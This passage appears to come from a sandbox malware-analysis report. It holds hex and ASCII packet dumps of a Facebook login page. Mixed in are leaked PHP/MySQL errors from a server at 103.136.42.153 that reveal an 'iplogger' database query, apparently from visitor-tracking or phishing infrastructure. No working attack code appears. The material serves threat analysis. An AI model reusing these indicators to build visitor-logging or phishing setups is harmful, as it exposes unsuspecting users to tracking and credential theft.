'@'localhost'%20(using%20password:%20YES)%3Cbr%3E%0A%3Cbr%3Eselect%20iplogger%20from%20t_channels%20where%20name='38b2c7a1af454d382927f81543d86055886bc02863457'%20limit%200,1%3Cbr%3E%0A%3Cbr%3E%0A%3Csmall%3E%0A%3Cfont%20color
2022-10-07 13:58:46 UTC	179	IN	Data Raw: 63 73 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 20 64 61 74 61 2d 62 6f 6f 74 6c 6f 61 64 65 72 2d 68 61 73 68 3d 22 6f 42 2f 79 58 67 33 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 2f 72 73 72 63 2e 70 68 70 2f 76 33 2f 79 6f 2f 6c 2f 30 2c 63 72 6f 73 73 2f 58 48 77 75 41 5f 5f 34 32 41 66 2e 63 73 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 20 64 61 74 61 2d 62 6f 6f 74 6c 6f 61 64 65 72 2d 68 61 73 68 3d 22 34 42 47 54 6d 43 37 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c Data Ascii: css?_nc_x=Ij3Wp8lg5Kz" data-bootloader-hash="oB/yXg3" /><link type="text/css" rel="stylesheet" href="https://static.xx.fbcdn.net/rsrc.php/v3/yo/l/0,cross/XHwuA__42Af.css?_nc_x=Ij3Wp8lg5Kz" data-bootloader-hash="4BGTmC7" /><link type="text/css" rel="styl
2022-10-07 13:58:46 UTC	180	IN	Data Raw: 34 5f 5a 51 69 30 73 54 6a 53 74 2d 52 78 34 6d 77 22 7d 2c 22 38 31 32 36 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 34 55 37 71 47 30 36 70 39 73 46 36 75 38 57 50 77 22 7d 2c 22 36 37 36 38 33 38 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 36 6e 4e 31 65 68 54 39 79 71 2d 32 71 36 38 72 4d 22 7d 2c 22 31 32 31 37 31 35 37 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 36 42 37 59 6d 6c 6c 4f 73 41 72 6e 4b 36 52 57 6b 22 7d 2c 22 31 35 35 34 38 32 37 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 37 7a 75 65 47 4c 68 47 6f 30 63 54 35 78 45 46 73 22 7d 2c 22 31 37 33 38 34 38 36 22 3a 7b 22 72 65 73 Data Ascii: 4_ZQi0sTjSt-Rx4mw"},"8126":{"result":false,"hash":"AT4U7qG06p9sF6u8WPw"},"676838":{"result":false,"hash":"AT6nN1ehT9yq-2q68rM"},"1217157":{"result":false,"hash":"AT6B7YmllOsArnK6RWk"},"1554827":{"result":false,"hash":"AT7zueGLhGo0cT5xEFs"},"1738486":{"res
2022-10-07 13:58:46 UTC	182	IN	Data Raw: 30 2c 22 73 22 3a 22 4c 61 78 22 7d 2c 22 77 64 22 3a 7b 22 74 22 3a 36 30 34 38 30 30 2c 22 73 22 3a 22 4c 61 78 22 7d 2c 22 78 2d 72 65 66 65 72 65 72 22 3a 7b 22 73 22 3a 22 4e 6f 6e 65 22 7d 2c 22 78 2d 73 72 63 22 3a 7b 22 74 22 3a 31 2c 22 73 22 3a 22 4e 6f 6e 65 22 7d 7d 2c 32 31 30 34 5d 2c 5b 22 43 75 72 72 65 6e 74 43 6f 6d 6d 75 6e 69 74 79 49 6e 69 74 69 61 6c 44 61 74 61 22 2c 5b 5d 2c 7b 7d 2c 34 39 30 5d 2c 5b 22 43 75 72 72 65 6e 74 45 6e 76 69 72 6f 6e 6d 65 6e 74 22 2c 5b 5d 2c 7b 22 66 61 63 65 62 6f 6f 6b 64 6f 74 63 6f 6d 22 3a 74 72 75 65 2c 22 6d 65 73 73 65 6e 67 65 72 64 6f 74 63 6f 6d 22 3a 66 61 6c 73 65 2c 22 77 6f 72 6b 70 6c 61 63 65 64 6f 74 63 6f 6d 22 3a 66 61 6c 73 65 2c 22 69 6e 73 74 61 67 72 61 6d 64 6f 74 63 6f 6d 22 Data Ascii: 0,"s":"Lax"},"wd":{"t":604800,"s":"Lax"},"x-referer":{"s":"None"},"x-src":{"t":1,"s":"None"}},2104],["CurrentCommunityInitialData",[],{},490],["CurrentEnvironment",[],{"facebookdotcom":true,"messengerdotcom":false,"workplacedotcom":false,"instagramdotcom"
2022-10-07 13:58:46 UTC	183	IN	Data Raw: 65 72 73 69 6f 6e 22 3a 32 2c 22 73 68 6f 75 6c 64 5f 72 61 6e 64 6f 6d 69 7a 65 22 3a 66 61 6c 73 65 7d 2c 32 31 31 31 5d 2c 5b 22 55 73 65 72 41 67 65 6e 74 44 61 74 61 22 2c 5b 5d 2c 7b 22 62 72 6f 77 73 65 72 41 72 63 68 69 74 65 63 74 75 72 65 22 3a 22 36 34 22 2c 22 62 72 6f 77 73 65 72 46 75 6c 6c 56 65 72 73 69 6f 6e 22 3a 6e 75 6c 6c 2c 22 62 72 6f 77 73 65 72 4d 69 6e 6f 72 56 65 72 73 69 6f 6e 22 3a 6e 75 6c 6c 2c 22 62 72 6f 77 73 65 72 4e 61 6d 65 22 3a 22 55 6e 6b 6e 6f 77 6e 22 2c 22 62 72 6f 77 73 65 72 56 65 72 73 69 6f 6e 22 3a 6e 75 6c 6c 2c 22 64 65 76 69 63 65 4e 61 6d 65 22 3a 22 55 6e 6b 6e 6f 77 6e 22 2c 22 65 6e 67 69 6e 65 4e 61 6d 65 22 3a 22 55 6e 6b 6e 6f 77 6e 22 2c 22 65 6e 67 69 6e 65 56 65 72 73 69 6f 6e 22 3a 6e 75 6c 6c Data Ascii: ersion":2,"should_randomize":false},2111],["UserAgentData",[],{"browserArchitecture":"64","browserFullVersion":null,"browserMinorVersion":null,"browserName":"Unknown","browserVersion":null,"deviceName":"Unknown","engineName":"Unknown","engineVersion":null
2022-10-07 13:58:46 UTC	184	IN	Data Raw: 53 52 54 5f 42 41 4e 5a 41 49 5f 53 52 54 5f 43 4f 52 45 5f 4c 4f 47 47 45 52 22 2c 22 53 52 54 5f 42 41 4e 5a 41 49 5f 53 52 54 5f 4d 41 49 4e 5f 4c 4f 47 47 45 52 22 2c 22 57 4f 52 4b 50 4c 41 43 45 5f 50 4c 41 54 46 4f 52 4d 5f 53 45 43 55 52 45 5f 41 50 50 53 5f 4d 41 49 4c 42 4f 58 45 53 22 2c 22 50 4f 43 4b 45 54 5f 4d 4f 4e 53 54 45 52 53 5f 55 50 44 41 54 45 5f 4e 41 4d 45 22 2c 22 49 43 5f 44 49 53 41 42 4c 45 5f 4d 45 52 47 45 5f 54 4f 4f 4c 5f 46 45 45 44 5f 43 48 45 43 4b 5f 46 4f 52 5f 52 45 50 4c 41 43 45 5f 53 43 48 45 44 55 4c 45 22 2c 22 41 44 53 5f 45 50 44 5f 49 4d 50 41 43 54 45 44 5f 41 44 56 45 52 54 49 53 45 52 5f 4d 49 47 52 41 54 45 5f 58 43 4f 4e 54 52 4f 4c 4c 45 52 22 2c 22 52 45 43 52 55 49 54 49 4e 47 5f 43 41 4e 44 49 44 41 Data Ascii: SRT_BANZAI_SRT_CORE_LOGGER","SRT_BANZAI_SRT_MAIN_LOGGER","WORKPLACE_PLATFORM_SECURE_APPS_MAILBOXES","POCKET_MONSTERS_UPDATE_NAME","IC_DISABLE_MERGE_TOOL_FEED_CHECK_FOR_REPLACE_SCHEDULE","ADS_EPD_IMPACTED_ADVERTISER_MIGRATE_XCONTROLLER","RECRUITING_CANDIDA
2022-10-07 13:58:46 UTC	186	IN	Data Raw: 31 38 65 35 65 0d 0a 65 6d 65 6e 74 61 74 69 6f 6e 45 78 70 65 72 69 6d 65 6e 74 73 22 2c 5b 5d 2c 7b 22 70 72 65 66 65 72 5f 6d 65 73 73 61 67 65 5f 63 68 61 6e 6e 65 6c 22 3a 74 72 75 65 7d 2c 33 34 31 39 5d 2c 5b 22 44 54 53 47 49 6e 69 74 44 61 74 61 22 2c 5b 5d 2c 7b 22 74 6f 6b 65 6e 22 3a 22 22 2c 22 61 73 79 6e 63 5f 67 65 74 5f 74 6f 6b 65 6e 22 3a 22 22 7d 2c 33 35 31 35 5d 2c 5b 22 55 72 69 4e 65 65 64 52 61 77 51 75 65 72 79 53 56 43 6f 6e 66 69 67 22 2c 5b 5d 2c 7b 22 75 72 69 73 22 3a 5b 22 64 6d 73 2e 6e 65 74 6d 6e 67 2e 63 6f 6d 22 2c 22 64 6f 75 62 6c 65 63 6c 69 63 6b 2e 6e 65 74 22 2c 22 72 2e 6d 73 6e 2e 63 6f 6d 22 2c 22 77 61 74 63 68 69 74 2e 73 6b 79 2e 63 6f 6d 22 2c 22 67 72 61 70 68 69 74 65 2e 69 6e 73 74 61 67 72 61 6d 2e 63 Data Ascii: 18e5eementationExperiments",[],{"prefer_message_channel":true},3419],["DTSGInitData",[],{"token":"","async_get_token":""},3515],["UriNeedRawQuerySVConfig",[],{"uris":["dms.netmng.com","doubleclick.net","r.msn.com","watchit.sky.com","graphite.instagram.c
2022-10-07 13:58:46 UTC	187	IN	Data Raw: 73 74 43 6f 6e 66 69 67 22 2c 5b 5d 2c 7b 22 72 65 74 72 79 4f 6e 4e 65 74 77 6f 72 6b 45 72 72 6f 72 22 3a 22 31 22 2c 22 75 73 65 46 65 74 63 68 53 74 72 65 61 6d 41 6a 61 78 50 69 70 65 54 72 61 6e 73 70 6f 72 74 22 3a 66 61 6c 73 65 7d 2c 33 32 38 5d 2c 5b 22 46 62 74 52 65 73 75 6c 74 47 4b 22 2c 5b 5d 2c 7b 22 73 68 6f 75 6c 64 52 65 74 75 72 6e 46 62 74 52 65 73 75 6c 74 22 3a 74 72 75 65 2c 22 69 6e 6c 69 6e 65 4d 6f 64 65 22 3a 22 4e 4f 5f 49 4e 4c 49 4e 45 22 7d 2c 38 37 36 5d 2c 5b 22 49 6e 74 6c 50 68 6f 6e 6f 6c 6f 67 69 63 61 6c 52 75 6c 65 73 22 2c 5b 5d 2c 7b 22 6d 65 74 61 22 3a 7b 22 5c 2f 5f 42 5c 2f 22 3a 22 28 5b 2e 2c 21 3f 5c 5c 73 5d 7c 5e 29 22 2c 22 5c 2f 5f 45 5c 2f 22 3a 22 28 5b 2e 2c 21 3f 5c 5c 73 5d 7c 24 29 22 7d 2c 22 70 Data Ascii: stConfig",[],{"retryOnNetworkError":"1","useFetchStreamAjaxPipeTransport":false},328],["FbtResultGK",[],{"shouldReturnFbtResult":true,"inlineMode":"NO_INLINE"},876],["IntlPhonologicalRules",[],{"meta":{"\/_B\/":"([.,!?\\s]\|^)","\/_E\/":"([.,!?\\s]\|$)"},"p
2022-10-07 13:58:46 UTC	189	IN	Data Raw: 63 74 5c 2f 22 3a 31 2c 22 5c 2f 71 70 5c 2f 61 63 74 69 6f 6e 5c 2f 63 6c 6f 73 65 5c 2f 22 3a 31 2c 22 5c 2f 7a 65 72 6f 5c 2f 73 75 70 70 6f 72 74 5c 2f 69 6e 65 6c 69 67 69 62 6c 65 5c 2f 22 3a 31 2c 22 5c 2f 7a 65 72 6f 5f 62 61 6c 61 6e 63 65 5f 72 65 64 69 72 65 63 74 5c 2f 22 3a 31 2c 22 5c 2f 7a 65 72 6f 5f 62 61 6c 61 6e 63 65 5f 72 65 64 69 72 65 63 74 22 3a 31 2c 22 5c 2f 7a 65 72 6f 5f 62 61 6c 61 6e 63 65 5f 72 65 64 69 72 65 63 74 5c 2f 6c 5c 2f 22 3a 31 2c 22 5c 2f 6c 2e 70 68 70 22 3a 31 2c 22 5c 2f 6c 73 72 2e 70 68 70 22 3a 31 2c 22 5c 2f 61 6a 61 78 5c 2f 64 74 73 67 5c 2f 22 3a 31 2c 22 5c 2f 63 68 65 63 6b 70 6f 69 6e 74 5c 2f 62 6c 6f 63 6b 5c 2f 22 3a 31 2c 22 5c 2f 65 78 69 74 64 73 69 74 65 22 3a 31 2c 22 5c 2f 7a 65 72 6f 5c 2f Data Ascii: ct\/":1,"\/qp\/action\/close\/":1,"\/zero\/support\/ineligible\/":1,"\/zero_balance_redirect\/":1,"\/zero_balance_redirect":1,"\/zero_balance_redirect\/l\/":1,"\/l.php":1,"\/lsr.php":1,"\/ajax\/dtsg\/":1,"\/checkpoint\/block\/":1,"\/exitdsite":1,"\/zero\/
2022-10-07 13:58:46 UTC	190	IN	Data Raw: 73 5c 2f 22 3a 31 2c 22 5c 2f 75 70 73 65 6c 6c 5c 2f 63 6f 6e 74 69 6e 75 65 5c 2f 22 3a 31 2c 22 5c 2f 75 70 73 65 6c 6c 5c 2f 68 5c 2f 70 72 6f 6d 6f 73 5c 2f 22 3a 31 2c 22 5c 2f 75 70 73 65 6c 6c 5c 2f 6c 6f 61 6e 5c 2f 6c 65 61 72 6e 6d 6f 72 65 5c 2f 22 3a 31 2c 22 5c 2f 75 70 73 65 6c 6c 5c 2f 70 75 72 63 68 61 73 65 5c 2f 22 3a 31 2c 22 5c 2f 75 70 73 65 6c 6c 5c 2f 70 72 6f 6d 6f 73 5c 2f 75 70 67 72 61 64 65 5c 2f 22 3a 31 2c 22 5c 2f 75 70 73 65 6c 6c 5c 2f 62 75 79 5f 72 65 64 69 72 65 63 74 5c 2f 22 3a 31 2c 22 5c 2f 75 70 73 65 6c 6c 5c 2f 6c 6f 61 6e 5c 2f 62 75 79 63 6f 6e 66 69 72 6d 5c 2f 22 3a 31 2c 22 5c 2f 75 70 73 65 6c 6c 5c 2f 6c 6f 61 6e 5c 2f 62 75 79 5c 2f 22 3a 31 2c 22 5c 2f 75 70 73 65 6c 6c 5c 2f 73 6d 73 5c 2f 22 3a 31 2c Data Ascii: s\/":1,"\/upsell\/continue\/":1,"\/upsell\/h\/promos\/":1,"\/upsell\/loan\/learnmore\/":1,"\/upsell\/purchase\/":1,"\/upsell\/promos\/upgrade\/":1,"\/upsell\/buy_redirect\/":1,"\/upsell\/loan\/buyconfirm\/":1,"\/upsell\/loan\/buy\/":1,"\/upsell\/sms\/":1,
2022-10-07 13:58:46 UTC	192	IN	Data Raw: 6c 79 74 69 63 73 43 6f 72 65 44 61 74 61 22 2c 5b 5d 2c 7b 22 64 65 76 69 63 65 5f 69 64 22 3a 22 24 5e 7c 41 63 61 77 62 61 4f 38 37 70 6b 64 4c 52 5a 48 53 7a 6d 62 5f 64 51 5a 5a 66 46 4b 5a 5f 71 45 59 54 58 59 45 72 53 37 54 73 68 63 30 47 4d 5f 61 66 45 4c 61 4c 6b 54 62 6b 66 2d 57 65 78 33 43 4a 73 42 45 55 66 4f 4c 6e 59 4b 39 45 47 77 30 43 53 43 4b 48 31 6b 52 63 6a 4b 36 78 73 7c 66 64 2e 41 63 61 72 76 58 66 71 4e 41 38 66 6c 43 6b 4e 54 51 48 4a 42 7a 66 47 75 2d 71 6d 73 7a 61 58 51 37 78 53 35 4e 5a 6a 66 4c 4c 56 58 55 73 61 46 4b 54 34 69 58 72 36 31 63 37 46 57 33 67 63 65 62 5f 32 4d 2d 45 55 68 59 6a 5f 5f 4d 4b 76 34 68 6b 6c 35 41 59 6c 22 2c 22 61 70 70 5f 69 64 22 3a 22 32 35 36 32 38 31 30 34 30 35 35 38 22 2c 22 65 6e 61 62 6c Data Ascii: lyticsCoreData",[],{"device_id":"$^\|AcawbaO87pkdLRZHSzmb_dQZZfFKZ_qEYTXYErS7Tshc0GM_afELaLkTbkf-Wex3CJsBEUfOLnYK9EGw0CSCKH1kRcjK6xs\|fd.AcarvXfqNA8flCkNTQHJBzfGu-qmszaXQ7xS5NZjfLLVXUsaFKT4iXr61c7FW3gceb_2M-EUhYj__MKv4hkl5AYl","app_id":"256281040558","enabl
2022-10-07 13:58:46 UTC	193	IN	Data Raw: 22 73 65 74 54 69 6d 65 6f 75 74 41 63 72 6f 73 73 54 72 61 6e 73 69 74 69 6f 6e 73 42 6c 75 65 22 5d 2c 7b 22 5f 5f 72 63 22 3a 5b 22 73 65 74 54 69 6d 65 6f 75 74 41 63 72 6f 73 73 54 72 61 6e 73 69 74 69 6f 6e 73 42 6c 75 65 22 2c 22 41 61 31 49 79 44 71 72 4f 61 69 72 66 5f 5f 77 65 74 2d 5a 5a 4e 43 55 51 4b 43 6d 73 59 49 70 6a 33 78 5a 4a 67 73 76 41 39 49 72 37 56 68 5a 38 4b 41 52 4f 6c 74 48 59 56 36 41 75 7a 43 69 31 39 35 4e 76 75 71 30 4f 5f 2d 54 48 74 4a 33 57 6a 47 58 67 73 6b 4a 52 39 55 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 31 30 30 33 32 36 37 22 2c 5b 22 63 6c 65 61 72 49 6e 74 65 72 76 61 6c 42 6c 75 65 22 5d 2c 7b 22 5f 5f 72 63 22 3a 5b 22 63 6c 65 61 72 49 6e 74 65 72 76 61 6c 42 6c 75 65 22 2c 22 41 61 31 49 79 44 71 72 4f 61 69 Data Ascii: "setTimeoutAcrossTransitionsBlue"],{"__rc":["setTimeoutAcrossTransitionsBlue","Aa1IyDqrOairf__wet-ZZNCUQKCmsYIpj3xZJgsvA9Ir7VhZ8KAROltHYV6AuzCi195Nvuq0O_-THtJ3WjGXgskJR9U"]},-1],["cr:1003267",["clearIntervalBlue"],{"__rc":["clearIntervalBlue","Aa1IyDqrOai
2022-10-07 13:58:46 UTC	195	IN	Data Raw: 62 6f 6f 73 74 22 3a 31 2c 22 69 6e 74 65 72 61 63 74 69 6f 6e 5f 72 65 67 65 78 65 73 22 3a 7b 7d 2c 22 69 6e 74 65 72 61 63 74 69 6f 6e 5f 62 6f 6f 73 74 22 3a 7b 7d 2c 22 65 76 65 6e 74 5f 74 79 70 65 73 22 3a 7b 7d 2c 22 6d 61 6e 75 61 6c 5f 69 6e 73 74 72 75 6d 65 6e 74 61 74 69 6f 6e 22 3a 66 61 6c 73 65 2c 22 70 72 6f 66 69 6c 65 5f 65 61 67 65 72 5f 65 78 65 63 75 74 69 6f 6e 22 3a 66 61 6c 73 65 2c 22 64 69 73 61 62 6c 65 5f 68 65 75 72 69 73 74 69 63 22 3a 74 72 75 65 2c 22 64 69 73 61 62 6c 65 5f 65 76 65 6e 74 5f 70 72 6f 66 69 6c 65 72 22 3a 66 61 6c 73 65 7d 2c 31 37 32 36 5d 2c 5b 22 41 64 73 49 6e 74 65 72 66 61 63 65 73 53 65 73 73 69 6f 6e 43 6f 6e 66 69 67 22 2c 5b 5d 2c 7b 7d 2c 32 33 39 33 5d 2c 5b 22 49 6e 74 6c 43 75 72 72 65 6e 74 Data Ascii: boost":1,"interaction_regexes":{},"interaction_boost":{},"event_types":{},"manual_instrumentation":false,"profile_eager_execution":false,"disable_heuristic":true,"disable_event_profiler":false},1726],["AdsInterfacesSessionConfig",[],{},2393],["IntlCurrent
2022-10-07 13:58:46 UTC	196	IN	Data Raw: 65 66 65 72 72 65 72 3d 22 70 61 67 65 6c 65 74 5f 62 6c 75 65 62 61 72 22 3e 3c 64 69 76 20 69 64 3d 22 62 6c 75 65 42 61 72 44 4f 4d 49 6e 73 70 65 63 74 6f 72 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 5f 35 33 6a 68 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 6c 6f 67 67 65 64 6f 75 74 5f 6d 65 6e 75 62 61 72 5f 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6c 65 61 72 66 69 78 20 6c 6f 67 67 65 64 6f 75 74 5f 6d 65 6e 75 62 61 72 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 6c 66 6c 6f 61 74 20 5f 6f 68 65 22 3e 3c 68 31 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 22 20 74 69 74 6c 65 3d 22 47 6f 20 74 6f 20 46 61 63 65 62 6f 6f 6b 20 68 6f 6d 65 22 3e 3c 69 20 63 6c 61 Data Ascii: eferrer="pagelet_bluebar"><div id="blueBarDOMInspector"><div class="_53jh"><div class="loggedout_menubar_container"><div class="clearfix loggedout_menubar"><div class="lfloat _ohe"><h1><a href="https://www.facebook.com/" title="Go to Facebook home"><i cla
2022-10-07 13:58:46 UTC	197	IN	Data Raw: 64 69 76 3e 3c 62 75 74 74 6f 6e 20 76 61 6c 75 65 3d 22 31 22 20 63 6c 61 73 73 3d 22 5f 34 32 66 74 20 5f 34 6a 79 30 20 5f 65 73 31 20 5f 33 6a 64 38 20 6c 6f 67 69 6e 5f 66 6f 72 6d 5f 6c 6f 67 69 6e 5f 62 75 74 74 6f 6e 20 5f 34 6a 79 35 20 5f 34 6a 79 31 20 73 65 6c 65 63 74 65 64 20 5f 35 31 73 79 22 20 69 64 3d 22 6c 6f 67 69 6e 62 75 74 74 6f 6e 22 20 64 61 74 61 2d 74 65 73 74 69 64 3d 22 72 6f 79 61 6c 5f 6c 6f 67 69 6e 5f 62 75 74 74 6f 6e 22 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 3e 4c 6f 67 20 49 6e 3c 2f 62 75 74 74 6f 6e 3e 3c 2f 64 69 76 3e 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3d 22 6f 66 66 22 20 6e 61 6d 65 3d 22 74 69 6d 65 7a 6f 6e 65 22 20 76 61 6c 75 65 3d 22 22 20 69 Data Ascii: div><button value="1" class="_42ft _4jy0 _es1 _3jd8 login_form_login_button _4jy5 _4jy1 selected _51sy" id="loginbutton" data-testid="royal_login_button" type="submit">Log In</button></div><input type="hidden" autocomplete="off" name="timezone" value="" i
2022-10-07 13:58:46 UTC	199	IN	Data Raw: 22 5f 34 32 66 74 20 5f 34 6a 79 30 20 73 69 67 6e 75 70 5f 62 74 6e 20 5f 34 6a 79 34 20 5f 34 6a 79 32 20 73 65 6c 65 63 74 65 64 20 5f 35 31 73 79 22 20 68 72 65 66 3d 22 2f 72 2e 70 68 70 3f 6c 6f 63 61 6c 65 3d 65 6e 5f 55 53 22 3e 53 69 67 6e 20 55 70 3c 2f 61 3e 3c 2f 73 70 61 6e 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 69 64 3d 22 67 6c 6f 62 61 6c 43 6f 6e 74 61 69 6e 65 72 22 20 63 6c 61 73 73 3d 22 5f 63 71 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 62 5f 63 6f 6e 74 65 6e 74 20 63 6c 65 61 72 66 69 78 20 22 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 76 6c 20 5f 34 2d 64 6f 22 3e 3c Data Ascii: "_42ft _4jy0 signup_btn _4jy4 _4jy2 selected _51sy" href="/r.php?locale=en_US">Sign Up</a></span></div></div></div></div></div></div><div id="globalContainer" class="_cqt"><div class="fb_content clearfix " id="content" role="main"><div class="pvl _4-do"><
2022-10-07 13:58:46 UTC	200	IN	Data Raw: 2d 64 65 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 25 33 43 62 72 25 32 30 2f 25 33 45 25 30 41 25 33 43 62 25 33 45 44 65 70 72 65 63 61 74 65 64 25 33 43 2f 62 25 33 45 3a 25 32 30 25 32 30 6d 79 73 71 6c 5f 70 63 6f 6e 6e 65 63 74 28 29 3a 25 32 30 54 68 65 25 32 30 6d 79 73 71 6c 25 32 30 65 78 74 65 6e 73 69 6f 6e 25 32 30 69 73 25 32 30 64 65 70 72 65 63 61 74 65 64 25 32 30 61 6e 64 25 32 30 77 69 6c 6c 25 32 30 62 65 25 32 30 72 65 6d 6f 76 65 64 25 32 30 69 6e 25 32 30 74 68 65 25 32 30 66 75 74 75 72 65 3a 25 32 30 75 73 65 25 32 30 6d 79 73 71 6c 69 25 32 30 6f 72 25 32 30 50 44 4f 25 32 30 69 6e 73 74 65 61 64 25 32 30 69 6e 25 32 30 25 33 43 62 25 33 45 2f 77 77 77 2f 77 77 77 72 6f 6f 74 2f 31 30 33 2e 31 33 36 2e 34 32 2e 31 35 33 2f 73 65 Data Ascii: -de.facebook.com/%3Cbr%20/%3E%0A%3Cb%3EDeprecated%3C/b%3E:%20%20mysql_pconnect():%20The%20mysql%20extension%20is%20deprecated%20and%20will%20be%20removed%20in%20the%20future:%20use%20mysqli%20or%20PDO%20instead%20in%20%3Cb%3E/www/wwwroot/103.136.42.153/se
2022-10-07 13:58:46 UTC	202	IN	Data Raw: 35 33 43 62 72 5c 75 30 30 32 35 32 30 5c 2f 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 5c 75 30 30 32 35 33 45 44 65 70 72 65 63 61 74 65 64 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 3a 5c 75 30 30 32 35 32 30 5c 75 30 30 32 35 32 30 6d 79 73 71 6c 5f 70 63 6f 6e 6e 65 63 74 28 29 3a 5c 75 30 30 32 35 32 30 54 68 65 5c 75 30 30 32 35 32 30 6d 79 73 71 6c 5c 75 30 30 32 35 32 30 65 78 74 65 6e 73 69 6f 6e 5c 75 30 30 32 35 32 30 69 73 5c 75 30 30 32 35 32 30 64 65 70 72 65 63 61 74 65 64 5c 75 30 30 32 35 32 30 61 6e 64 5c 75 30 30 32 35 32 30 77 69 6c 6c 5c 75 30 30 32 35 32 30 62 65 5c 75 30 30 32 35 32 30 72 65 6d 6f 76 65 64 5c 75 30 30 32 35 32 30 69 6e 5c 75 30 30 32 35 32 30 74 68 65 5c 75 30 30 32 35 Data Ascii: 53Cbr\u002520\/\u00253E\u00250A\u00253Cb\u00253EDeprecated\u00253C\/b\u00253E:\u002520\u002520mysql_pconnect():\u002520The\u002520mysql\u002520extension\u002520is\u002520deprecated\u002520and\u002520will\u002520be\u002520removed\u002520in\u002520the\u0025
2022-10-07 13:58:46 UTC	203	IN	Data Raw: 30 32 35 33 43 66 6f 6e 74 5c 75 30 30 32 35 32 30 63 6f 6c 6f 72 3d 5c 75 30 30 32 35 32 32 5c 75 30 30 32 35 32 33 30 30 30 30 30 30 5c 75 30 30 32 35 32 32 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 5c 75 30 30 32 35 33 45 31 30 34 35 5c 75 30 30 32 35 32 30 2d 5c 75 30 30 32 35 32 30 41 63 63 65 73 73 5c 75 30 30 32 35 32 30 64 65 6e 69 65 64 5c 75 30 30 32 35 32 30 66 6f 72 5c 75 30 30 32 35 32 30 75 73 65 72 5c 75 30 30 32 35 32 30 26 23 30 33 39 3b 64 62 6e 65 77 30 31 26 23 30 33 39 3b 5c 75 30 30 34 30 26 23 30 33 39 3b 6c 6f 63 61 6c 68 6f 73 74 26 23 30 33 39 3b 5c 75 30 30 32 35 32 30 28 75 73 69 6e 67 5c 75 30 30 32 35 32 30 70 61 73 73 77 6f 72 64 3a 5c 75 30 30 32 35 32 30 59 45 53 29 5c 75 30 30 32 35 33 43 Data Ascii: 0253Cfont\u002520color=\u002522\u002523000000\u002522\u00253E\u00250A\u00253Cb\u00253E1045\u002520-\u002520Access\u002520denied\u002520for\u002520user\u002520'dbnew01'\u0040'localhost'\u002520(using\u002520password:\u002520YES)\u00253C
2022-10-07 13:58:46 UTC	205	IN	Data Raw: 74 61 62 61 73 65 2e 70 68 70 25 33 43 2f 62 25 33 45 25 32 30 6f 6e 25 32 30 6c 69 6e 65 25 32 30 25 33 43 62 25 33 45 34 37 25 33 43 2f 62 25 33 45 25 30 41 25 33 43 62 72 25 32 30 2f 25 33 45 25 30 41 25 33 43 62 72 25 32 30 2f 25 33 45 25 30 41 25 33 43 62 25 33 45 57 61 72 6e 69 6e 67 25 33 43 2f 62 25 33 45 3a 25 32 30 25 32 30 6d 79 73 71 6c 5f 71 75 65 72 79 28 29 25 32 30 65 78 70 65 63 74 73 25 32 30 70 61 72 61 6d 65 74 65 72 25 32 30 32 25 32 30 74 6f 25 32 30 62 65 25 32 30 72 65 73 6f 75 72 63 65 2c 25 32 30 62 6f 6f 6c 65 61 6e 25 32 30 67 69 76 65 6e 25 32 30 69 6e 25 32 30 25 33 43 62 25 33 45 2f 77 77 77 2f 77 77 77 72 6f 6f 74 2f 31 30 33 2e 31 33 36 2e 34 32 2e 31 35 33 2f 73 65 65 6d 6f 72 65 62 74 79 2f 69 6e 63 6c 75 64 65 73 2f 64 Data Ascii: tabase.php%3C/b%3E%20on%20line%20%3Cb%3E47%3C/b%3E%0A%3Cbr%20/%3E%0A%3Cbr%20/%3E%0A%3Cb%3EWarning%3C/b%3E:%20%20mysql_query()%20expects%20parameter%202%20to%20be%20resource,%20boolean%20given%20in%20%3Cb%3E/www/wwwroot/103.136.42.153/seemorebty/includes/d
